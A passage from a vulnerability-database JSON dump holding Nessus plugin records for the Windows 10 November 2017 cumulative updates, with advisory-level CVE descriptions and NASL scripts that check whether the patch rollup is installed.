vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11845)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048954: Windows 10 Version 1703 November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11845", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11874", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048954.NASL", "href": "https://www.tenable.com/plugins/nessus/104550", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104550);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11803\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11844\",\n \"CVE-2017-11845\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11861\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11870\",\n \"CVE-2017-11871\",\n \"CVE-2017-11872\",\n \"CVE-2017-11873\",\n \"CVE-2017-11874\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101704,\n 101705,\n 101706,\n 101707,\n 101708,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101723,\n 101725,\n 101727,\n 101728,\n 101729,\n 101730,\n 101731,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101749,\n 101750,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048954\");\n script_xref(name:\"MSFT\", value:\"MS17-4048954\");\n\n script_name(english:\"KB4048954: Windows 10 Version 1703 November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048954.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11870,\n CVE-2017-11871, CVE-2017-11873)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11803, CVE-2017-11844)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge as a result of how memory is accessed in\n code compiled by the Edge Just-In-Time (JIT) compiler\n that allows Control Flow Guard (CFG) to be bypassed. By\n itself, this CFG bypass vulnerability does not allow\n arbitrary code execution. However, an attacker could use\n the CFG bypass vulnerability in conjunction with another\n vulnerability, such as a remote code execution\n vulnerability, to run arbitrary code on a target system.\n (CVE-2017-11874)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11845)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\");\n # https://support.microsoft.com/en-us/help/4048954/windows-10-update-kb4048954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2be2679f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048954.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048954');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048954])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:46", "description": "The remote Windows host is missing security update 4048956.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048956: Windows 10 LTSB November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048956.NASL", "href": "https://www.tenable.com/plugins/nessus/104552", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104552);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101706,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101725,\n 101727,\n 101729,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048956\");\n script_xref(name:\"MSFT\", value:\"MS17-4048956\");\n\n script_name(english:\"KB4048956: Windows 10 LTSB November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048956.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)\");\n # https://support.microsoft.com/en-us/help/4048956/windows-10-update-kb4048956\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60fecb50\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048956.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048956');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048956])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:57", "description": "The remote Windows host is missing security update 4048953.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to 